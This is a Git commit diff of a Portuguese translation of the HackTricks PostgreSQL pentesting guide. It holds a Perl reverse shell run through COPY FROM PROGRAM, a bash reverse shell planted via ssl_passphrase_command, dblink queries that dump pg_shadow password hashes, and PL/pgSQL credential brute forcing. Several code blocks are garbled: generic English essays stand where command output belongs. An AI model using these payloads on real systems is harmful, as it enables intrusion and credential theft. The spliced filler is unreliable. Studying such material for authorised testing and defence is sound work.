Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-28 07:31:10 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated ['network-services-pentesting/pentesting-postgresql.md'] to p

Browse source
This commit is contained in:
Translator 2023-08-29 18:52:55 +00:00
parent 9288ce0d80
commit f3ce9e6967
1 changed files with 94 additions and 47 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

141
network-services-pentesting/pentesting-postgresql.md
View file

@ -16,15 +16,15 @@ Acesse hoje mesmo:
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## **Informações Básicas**
## **Informações básicas**
O **PostgreSQL** é um sistema de banco de dados objeto-relacional de código aberto que utiliza e estende a linguagem SQL.
**PostgreSQL** é um sistema de banco de dados objeto-relacional de código aberto que utiliza e estende a linguagem SQL.
**Porta padrão:** 5432, e se essa porta já estiver em uso, parece que o postgresql usará a próxima porta (provavelmente 5433) que não está em uso.
**Porta padrão:** 5432, e se esta porta já estiver em uso, parece que o postgresql usará a próxima porta (provavelmente 5433) que não está em uso.
```
PORT STATE SERVICE
5432/tcp open pgsql
@ -71,7 +71,10 @@ psql -h localhost -d <database_name> -U <User> #Password will be prompted
\du+ # Get users roles
# Get current user
Select user;
SELECT user;
# Get current database
SELECT current_catalog;
# List schemas
SELECT schema_name,schema_owner FROM information_schema.schemata;
@ -139,31 +142,65 @@ the server terminated abnormally before or while processing the request
## Introduction
PostgreSQL is an open-source relational database management system (RDBMS) that is widely used in web applications. As a pentester, it is important to understand how to assess the security of PostgreSQL installations and identify potential vulnerabilities.
PostgreSQL is an open-source relational database management system (RDBMS) that is widely used in web applications. As a pentester, it is important to understand how to test the security of PostgreSQL installations to identify potential vulnerabilities and weaknesses.
## Enumeration
The first step in pentesting a PostgreSQL server is to perform enumeration to gather information about the target. This can be done using tools like `nmap` or `Metasploit` to scan for open ports and identify the PostgreSQL service.
### Version Detection
## Brute Forcing
To determine the version of PostgreSQL running on a target system, you can use the following command:
Once the PostgreSQL service is identified, the next step is to attempt to brute force the login credentials. This can be done using tools like `Hydra` or `Metasploit` to try different combinations of usernames and passwords.
```bash
nmap -p 5432 --script postgresql-version <target>
```
### User Enumeration
To enumerate the users in a PostgreSQL database, you can use the following SQL query:
```sql
SELECT usename FROM pg_user;
```
### Database Enumeration
To enumerate the databases in a PostgreSQL server, you can use the following SQL query:
```sql
SELECT datname FROM pg_database;
```
## Exploitation
If the brute force attack is successful and valid credentials are obtained, the next step is to exploit the vulnerabilities in the PostgreSQL server. This can include SQL injection attacks, privilege escalation, or remote code execution.
### Default Credentials
## Privilege Escalation
PostgreSQL does not have default credentials, but it is common for users to set weak or easily guessable passwords. Therefore, it is important to test for weak credentials during a pentest.
Privilege escalation is a common technique used to gain higher levels of access on a PostgreSQL server. This can be done by exploiting misconfigurations or vulnerabilities in the server or by leveraging weak user permissions.
### SQL Injection
PostgreSQL is vulnerable to SQL injection attacks if user input is not properly sanitized. By injecting malicious SQL queries, an attacker can manipulate the database and potentially gain unauthorized access.
### Privilege Escalation
If a user has been granted excessive privileges in a PostgreSQL database, it may be possible to escalate their privileges and gain unauthorized access to sensitive data or perform unauthorized actions.
## Post-Exploitation
After gaining access to a PostgreSQL server, it is important to perform post-exploitation activities to maintain access and gather sensitive information. This can include creating backdoors, extracting data, or pivoting to other systems on the network.
### Dumping Data
To dump the contents of a PostgreSQL database, you can use the following command:
```bash
pg_dump -U <username> -d <database> -f <output_file>
```
### Creating Backdoors
After gaining unauthorized access to a PostgreSQL database, an attacker may want to create a backdoor to maintain access in the future. This can be done by creating a new user with administrative privileges or by modifying existing user privileges.
## Conclusion
Pentesting PostgreSQL servers requires a thorough understanding of the database system and its vulnerabilities. By following the steps outlined in this guide, pentesters can effectively assess the security of PostgreSQL installations and identify potential risks.
Pentesting PostgreSQL involves enumerating users and databases, testing for weak credentials, exploiting SQL injection vulnerabilities, and potentially escalating privileges. It is important to thoroughly test the security of PostgreSQL installations to ensure the protection of sensitive data.
```
DETAIL: FATAL: password authentication failed for user "name"
```
@ -265,14 +302,14 @@ SELECT grantee,table_schema,table_name,privilege_type FROM information_schema.ro
```
### Funções
Functions in PostgreSQL are named blocks of code that can be executed by calling their name. They are used to perform specific tasks and can accept parameters and return values. Functions can be created using the `CREATE FUNCTION` statement and can be written in various programming languages, including SQL, PL/pgSQL, and others.
Functions in PostgreSQL are named blocks of code that can be executed by calling their name. They are used to perform specific tasks and can accept parameters and return values. Functions can be created using the `CREATE FUNCTION` statement and can be written in various programming languages such as SQL, PL/pgSQL, Python, etc.
#### Creating Functions
To create a function in PostgreSQL, you need to specify the function name, input parameters (if any), return type, and the code block that defines the function's behavior. Here is the basic syntax for creating a function:
To create a function in PostgreSQL, you need to specify the function name, input parameters (if any), return type, and the code block that defines the function's behavior. Here is the syntax for creating a function:
```sql
CREATE FUNCTION function_name (parameter1 datatype, parameter2 datatype, ...)
CREATE FUNCTION function_name ([parameter1 data_type [, parameter2 data_type, ...]])
RETURNS return_type
LANGUAGE language_name
AS
@ -283,37 +320,47 @@ $$;
Let's break down the syntax:
- `CREATE FUNCTION`: This is the statement used to create a function.
- `function_name`: The name of the function you want to create.
- `(parameter1 datatype, parameter2 datatype, ...)`: The input parameters of the function, if any. Each parameter is specified with a name and a data type.
- `RETURNS return_type`: The return type of the function. It specifies the data type of the value that the function will return.
- `LANGUAGE language_name`: The programming language in which the function is written. PostgreSQL supports multiple languages, including SQL, PL/pgSQL, and others.
- `AS`: This keyword is used to indicate the start of the function's code block.
- `$$`: This is the delimiter used to enclose the function's code block. The code block contains the actual code that defines the function's behavior.
- `function_name`: The name of the function.
- `parameter1, parameter2, ...`: The input parameters of the function, each with its data type.
- `return_type`: The data type of the value returned by the function.
- `language_name`: The programming language used to write the function code.
- `$$ ... $$`: The code block that defines the function's behavior.
#### Example
Let's say we want to create a function called `calculate_average` that takes two integer parameters and returns the average of the two numbers. Here is how we can define this function in PostgreSQL:
Here is an example of a simple function that calculates the square of a given number:
```sql
CREATE FUNCTION calculate_average (num1 integer, num2 integer)
RETURNS numeric
CREATE FUNCTION square(num INTEGER)
RETURNS INTEGER
LANGUAGE SQL
AS
$$
SELECT (num1 + num2) / 2.0;
SELECT num * num;
$$;
```
In this example, the function `calculate_average` takes two integer parameters `num1` and `num2`. It returns a value of type `numeric`, which represents a decimal number. The function's code block simply calculates the average of the two numbers by adding them together and dividing the sum by 2.0.
In this example, the function `square` takes an integer parameter `num` and returns an integer value. The function code simply multiplies the input number by itself to calculate the square.
Once the function is created, you can call it like any other function in PostgreSQL. For example:
#### Calling Functions
Once a function is created, you can call it by using its name and passing the required arguments. Here is the syntax for calling a function:
```sql
SELECT calculate_average(10, 20);
SELECT function_name(argument1, argument2, ...);
```
This will return the average of 10 and 20, which is 15.
For example, to call the `square` function and calculate the square of the number 5, you would use the following query:
```sql
SELECT square(5);
```
This would return the result `25`, which is the square of 5.
#### Conclusion
Functions in PostgreSQL are powerful tools that allow you to encapsulate reusable code and perform specific tasks. By creating and calling functions, you can enhance the functionality and flexibility of your database applications.
```sql
# Interesting functions are inside pg_catalog
\df * #Get all
@ -409,7 +456,7 @@ No entanto, existem **outras técnicas para fazer upload de arquivos binários g
## <img src="../.gitbook/assets/i3.png" alt="" data-size="original">
**Dica de recompensa por bugs**: **inscreva-se** no **Intigriti**, uma plataforma premium de **recompensa por bugs criada por hackers, para hackers**! Junte-se a nós em [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) hoje mesmo e comece a ganhar recompensas de até **$100.000**!
**Dica de bug bounty**: **inscreva-se** no **Intigriti**, uma plataforma premium de **bug bounty criada por hackers, para hackers**! Junte-se a nós em [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) hoje mesmo e comece a ganhar recompensas de até **$100.000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
@ -435,7 +482,7 @@ DROP TABLE IF EXISTS cmd_exec;
COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';
```
{% hint style="warning" %}
Lembre-se de que se você não for um super usuário, mas tiver permissões **`CREATEROLE`**, você pode **tornar-se membro desse grupo:**
Lembre-se de que se você não é um super usuário, mas tem permissões **`CREATEROLE`**, você pode **tornar-se membro desse grupo:**
```sql
GRANT pg_execute_server_program TO username;
```
@ -445,15 +492,15 @@ GRANT pg_execute_server_program TO username;
Ou use o módulo `multi/postgres/postgres_copy_from_program_cmd_exec` do **metasploit**.\
Mais informações sobre essa vulnerabilidade [**aqui**](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5). Embora relatado como CVE-2019-9193, o Postges declarou que isso era um [recurso e não seria corrigido](https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/).
### RCE com Linguagens do PostgreSQL
### RCE com Linguagens PostgreSQL
{% content-ref url="../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md" %}
[rce-with-postgresql-languages.md](../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md)
{% endcontent-ref %}
### RCE com Extensões do PostgreSQL
### RCE com Extensões PostgreSQL
Depois de **aprender** do post anterior **como fazer upload de arquivos binários**, você pode tentar obter **RCE fazendo upload de uma extensão do postgresql e carregando-a**.
Depois de **aprender** do post anterior **como fazer upload de arquivos binários**, você pode tentar obter **RCE fazendo upload de uma extensão do PostgreSQL e carregando-a**.
{% content-ref url="../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md" %}
[rce-with-postgresql-extensions.md](../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md)
@ -461,7 +508,7 @@ Depois de **aprender** do post anterior **como fazer upload de arquivos binário
### RCE com arquivo de configuração do PostgreSQL
O **arquivo de configuração** do postgresql é **gravável** pelo **usuário postgres**, que é o que executa o banco de dados, então como **superusuário** você pode gravar arquivos no sistema de arquivos e, portanto, pode **sobrescrever esse arquivo**.
O **arquivo de configuração** do PostgreSQL é **gravável** pelo **usuário postgres**, que é o usuário que executa o banco de dados, então como **superusuário** você pode gravar arquivos no sistema de arquivos e, portanto, pode **sobrescrever este arquivo**.
![](<../.gitbook/assets/image (303).png>)
@ -470,8 +517,8 @@ O **arquivo de configuração** do postgresql é **gravável** pelo **usuário p
O arquivo de configuração possui alguns atributos interessantes que podem levar a RCE:
* `ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'` Caminho para a chave privada do banco de dados
* `ssl_passphrase_command = ''` Se o arquivo privado estiver protegido por senha (criptografado), o postgresql irá **executar o comando indicado nesse atributo**.
* `ssl_passphrase_command_supports_reload = off` **Se** esse atributo estiver **ligado**, o **comando** executado se a chave estiver protegida por senha **será executado** quando `pg_reload_conf()` for **executado**.
* `ssl_passphrase_command = ''` Se o arquivo privado estiver protegido por senha (criptografado), o PostgreSQL irá **executar o comando indicado neste atributo**.
* `ssl_passphrase_command_supports_reload = off` **Se** este atributo estiver **ligado**, o **comando** executado se a chave estiver protegida por senha **será executado** quando `pg_reload_conf()` for **executado**.
Então, um invasor precisará:
@ -479,7 +526,7 @@ Então, um invasor precisará:
2. **Criptografar** a chave privada baixada:
1. `rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key`
3. **Sobrescrever**
4. **Extrair** a **configuração** atual do postgresql
4. **Extrair** a **configuração** atual do PostgreSQL
5. **Sobrescrever** a **configuração** com a configuração dos atributos mencionados:
1. `ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'`
2. `ssl_passphrase_command_supports_reload = on`
@ -589,7 +636,7 @@ LANGUAGE sql VOLATILE AS 'COPY public.shell_commands_results (data) FROM PROGRAM
ANALYZE public.temp_table;
```
Depois de executar a consulta de exploração SQL, a tabela `shell_commands_results` contém a saída do código executado:
Após executar a consulta de exploração SQL, a tabela `shell_commands_results` contém a saída do código executado:
```
uid=2345(postgres) gid=2345(postgres) groups=2345(postgres)
```
@ -604,7 +651,7 @@ port=5432
user=someuser
password=supersecret
dbname=somedb',
'Select usename,passwd from pg_shadow')
'SELECT usename,passwd from pg_shadow')
RETURNS (result TEXT);
```
{% hint style="warning" %}
@ -619,7 +666,7 @@ Se você tiver a senha de um usuário com mais privilégios, mas o usuário não
SELECT * FROM dblink('host=127.0.0.1
user=someuser
dbname=somedb',
'Select usename,passwd from pg_shadow')
'SELECT usename,passwd from pg_shadow')
RETURNS (result TEXT);
```
É possível verificar se essa função existe com:
@ -661,7 +708,7 @@ E então **execute comandos**:
<figure><img src="../.gitbook/assets/image (9) (1).png" alt=""><figcaption></figcaption></figure>
### Passar Burteforce com PL/pgSQL
### Passar por Burteforce com PL/pgSQL
PL/pgSQL, como uma **linguagem de programação completa**, permite um controle procedural muito maior do que o SQL, incluindo a **capacidade de usar loops e outras estruturas de controle**. Declarações SQL e gatilhos podem chamar funções criadas na linguagem PL/pgSQL.\
**Você pode abusar dessa linguagem para pedir ao PostgreSQL que faça força bruta nas credenciais dos usuários.**
@ -718,8 +765,8 @@ Os métodos de autenticação baseados em senha são **md5**, **crypt** e **pass
* Você trabalha em uma **empresa de segurança cibernética**? Gostaria de ver sua **empresa anunciada no HackTricks**? Ou gostaria de ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>